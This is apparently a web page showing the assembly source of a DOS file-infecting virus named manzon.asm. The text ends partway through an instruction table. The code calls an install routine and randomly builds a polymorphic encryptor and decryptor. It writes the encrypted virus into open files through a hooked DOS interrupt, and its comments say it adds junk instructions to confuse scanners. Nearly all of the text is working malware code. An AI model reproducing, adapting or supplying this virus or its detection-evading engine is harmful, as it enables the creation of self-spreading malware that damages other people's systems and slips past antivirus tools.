📄 manzon.asm
字号:
.model tiny
.code
.386
code_size equ code_end-code_start
filecodelength equ filecodeend-code_start
org 100h
code_start:
start:
call StartDecryptSimple
SimpleCryptStart:
call InstallVirus ; Call Install routine
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following code randomly creates an encryptor and a matching :+
;+ decryptor. :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
WriteVirus:
push bx ; Save filehandle
in ax,40h ; Get random
;+:+:+:+:+:+:+Create random values to use in instructions+:+:+:+:+:+:+:
mov si,offset Rand1a ; First random in decryptor OP-codes
mov di,offset Rand1b ; First random in encryptor OP-codes
mov cx,5 ; 7*2 OP-codes to change
SetRandom:
mov [si],al
mov [di],al
add si,4 ; Next OP-code
add di,4 ; -----"-----
xor ax, 'P'-'O'-'O'-'R' ; Generate...
rol ax,5 ; ..new...
xor ax,'R'-'E'-'B'-'O'-'U'-'N'-'D' ; random
loop SetRandom
;+:+:+:+:+:+: Copy instructions from ENCode and DECode :+:+:+:+:+:+:+:
CreateCode:
push cs
pop es
mov cx,13 ;Counter, max 13 sequences
mov di,offset CCode1
mov si,offset DECode
mov word ptr ds:[CLength],0h ;Length of decryptor
CreateLoop:
mov si,offset DECode
in ax,40h ; Get random
ror ax,cl
xor ax,'I'-'M'-'M'-'O'-'R'-'T'-'A'-'L'
sub ax, 'R'-'I'-'O'-'T'
push ax ;Save for later use
mov bl,al
and bl,15 ;Mask only 0-15
shl bl,2 ;mul 4 to get right offset
xor bh,bh
add si,bx ;Get right OP-code
movsd ;move one inst (4 bytes)
std ;count backwards
push cx
push di ;Move code in CCode one inst
push si ;forward, so next inst could
mov si,offset CCode2+13*4 ;be first.
mov di,offset CCode2+14*4
mov cx,14
rep movsd
pop si
mov di,offset CCode2
cld
cmp bl,29 ;Should we use alt. encrypt?
jnb short Garbage ;No, just garbage-instructions
add si,ENCode-DECode-4 ;Get right pos in ENCode
movsd ;move one inst (4 bytes)
sub si,ENCode-DECode ;Back to old pos in DECode
jmp short NoGarbage
Garbage:
sub si,4 ;Same instructions again
movsd
NoGarbage:
pop di
pop cx
add word ptr ds:[CLength],4 ;Add length of decryptor
pop ax ;Get random value again
and ax,128+64 ;Leave de/encryptor like this?
jz short QuitLoop
loop CreateLoop
QuitLoop:
;+:+:+: Build the first instruction in decryptor (mov cx,??) :+:+:+:+:
xor ax,ax
in al,40h ; Another random
xor al,'A'
and al,7 ;Random between 0 and 7
mov byte ptr ds:[InitCX1],0b9h ;OP-Code for mov cx,?
mov bx,filecodelength
add bx,ax
mov word ptr ds:[InitCX1+1],bx ;Value to put in CX (counter)
;+:+:+: Build to second instruction (mov si, offset codestart) :+:+:+:+:
mov byte ptr ds:[InitSI1],0beh ;OP-Code for mov si,?
mov ax,[entry_p] ;EntryPoint
add ax,word ptr ds:[CLength] ;Length of cryptlines
add ax,15 ;size of rest of loop
add ax,[IPOffs] ;Then add 100h
NoCom: mov word ptr ds:[InitSI1+1],ax ;Value to put in CX (counter)
;+:+:+: Build the instruction that increase SI :+:+:+:+:
and bl,2 ; Get random for inc si
shl bl,2 ; mul 4
mov bh,0
mov si,offset DEcSI
add si,bx ; Get pos in ADD-SI-alts.
movsd
;+:+:+: Build the loop-instruction :+:+:+:+:
mov ah,0ffh
sub ah,[CLength] ; Calculate loop operand
sub ah,5
mov al,0e2h ; OP-code for loop
mov [di],ax ; Write loop command
;+:+:+: Write RET at end of encryptionroutine :+:+:+:+:
mov di,offset CCode2 ; Encryptionroutine
add di,word ptr ds:[Clength] ; Find end of ER
mov byte ptr ds:[di],0c3h ; Write a RET
;+:+:+: Write created loader to file :+:+:+:+:
pop bx ; Get filehandle
mov ah,40h ; Function WRITE
mov cx,word ptr ds:[CLength]
add cx,12
mov dx,offset InitCX1
int 21h ; Write decryptor to file
mov word ptr ds:[File_H],bx
;+:+:+:+: Cahnge decryptor so code could use it (put ret instead of inc)
mov di,offset CCode1 ; Encryptionroutine
add di,word ptr ds:[Clength] ; Find end of ER
mov byte ptr ds:[di],0c3h ; Write a RET
;+:+:+:+: Copy enc&dec-call-routine to end of virus :+:+:+:+:
mov si,offset ED_start ; Start of ED-routine
mov di,offset ED_buf ; buffer beyond virus
mov cx,ED_End-ED_start ; Size of ED-routine
rep movsb
call filecodeend ; Call copy
ret
;------ Routine to Encrypt virus, write virus, and decrypt virus
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following code will be copied to memory beyond the virus, :+
;+ and then called. The routine then calls the created :+
;+ encryptor, writing the encrypted virus the the file and :+
;+ then uses the modified decrytor to decrypt the virus again. :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
ED_start:
;+:+:+: Create RandomValue for simple enc/decryptor +:+:+:+
in al,40h
mov byte ptr cs:[DSRan],al
;+:+:+: Encrypt virus, using simple encryptor :+:+:+:+
mov ax,offset EncryptDecryptSimple
call ax
;+:+:+: Encrypt virus, using created encryptor :+:+:+:+
mov si,0100h ; Start of viruscode
mov cx,filecodelength
encloop:
mov ax,offset CCode2 ; offset to created enc-routine
call ax ; call it
inc si
loop encloop ; Encrypt whole virus
;+:+:+: Write encrypted virus to file :+:+:+:+
mov bx,word ptr ds:[File_H] ; Get filehandle
mov ah,40h ; Function WRITE
mov cx,filecodelength
mov dx,0100h
pushf
push cs ; Fake interrupt call
call DoOldInt
;+:+:+: Decrypt virus, using created encryptor :+:+:+:+
mov si,0100h ; Start of viruscode
mov cx,filecodelength
decloop:
mov ax,offset CCode1
call ax ; Call builded encryptroutine
inc si
loop decloop
;+:+:+: Decrypt virus, using simple decryptor :+:+:+:+
mov ax,offset EncryptDecryptSimple
call ax
;+:+:+: Write random number of extra bytes to file (0-15) :+:+:+:+
mov bx,word ptr ds:[File_H] ; Get filehandle
in ax,40h ; Get random in al
mov ds,ax ; Read from random segment
and ax,0fh ; mask bit 0-3
mov cx,ax ; No. bytes to write
mov ah,40h
add word ptr cs:[CLength],cx ; add length (must know this
xor dx,dx ; when creating EXE-header).
pushf
push cs ; Fake interrupt call
call DoOldInt
push cs ; Push back codeseg in DS
pop ds
ret
DoOldInt:
sti
db 0eah
OldInt dd 0
ED_End:
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following table contains 16 different 4-byte codesqeunces, :+
;+ randomly used by the decryptionroutine. The first 8 affects :+
;+ the decryption algoritm, and has a matching 4-byte inst- :+
;+ ruction in the ENCode-table. The rest is just garbage- :+
;+ instructions, used to make scanning harder. The morpher :+
;+ will pick a random number (1-16) of these instructions, :+
;+ and build the decryption routine. :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
DECode db 02eh,080h,004h ; add byte ptr cs:[si],?
Rand1a db ?
db 02eh,080h,02ch ; sub byte ptr cs:[si],?
Rand2a db ?
db 02eh,080h,034h ; xor byte ptr cs:[si],?
Rand3a db ?
db 02eh,0C0h,004h ; rol byte ptr cs:[si],?
Rand4a db ?
db 02eh,0C0h,00Ch ; ror byte ptr cs:[si],?
Rand5a db ?
db 02eh,0feh,00ch,090h ; dec byte ptr cs:[si]; nop
db 02eh,0feh,004h,090h ; inc byte ptr cs:[si]; nop
db 02eh,0f6h,01ch,090h ; neg byte ptr cs:[si]; nop
;-------The rest is just bullshit, used to confuse scanners
db 053h,08bh,0dch,05bh ; push bx; mov bx,sp; pop bx
db 093h,043h,090h,043h ; xchg bx,ax; inc bx; nop; inc bx
db 040h,08ah,0c4h,048h ; inc ax; mov al,ah; dec ax
db 08ch,0c8h,056h,05fh ; mov ax,cs; push si; pop di;
db 074h,000h,075h,000h ; je $+2; jne $+2;
db 08Bh,0c3h,02bh,0d8h ; mov ax,bx; sub ax,bx
db 003h,0feh,02ch,002h ; add di,si; sub al,2
db 0ebh,001h,0b4h,090h ; jmp $+3; mov ah,90h (b4h + nop)
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
;+ Following table contains the encryptionversions of the :+
;+ first 8 instructions in the DECode-table. :+
;+ SUB will be ADD, ROR will be ROL etc. :+
;+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+:+
ENCode db 02eh,080h,02ch ; sub byte ptr cs:[si],?
Rand1b db ?
db 02eh,080h,004h ; add byte ptr cs:[si],?
Rand2b db ?
db 02eh,080h,034h ; xor byte ptr cs:[si],?
Rand3b db ?
db 02eh,0C0h,00Ch ; ror byte ptr cs:[si],?
Rand4b db ?
db 02eh,0C0h,004h ; rol byte ptr cs:[si],?
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -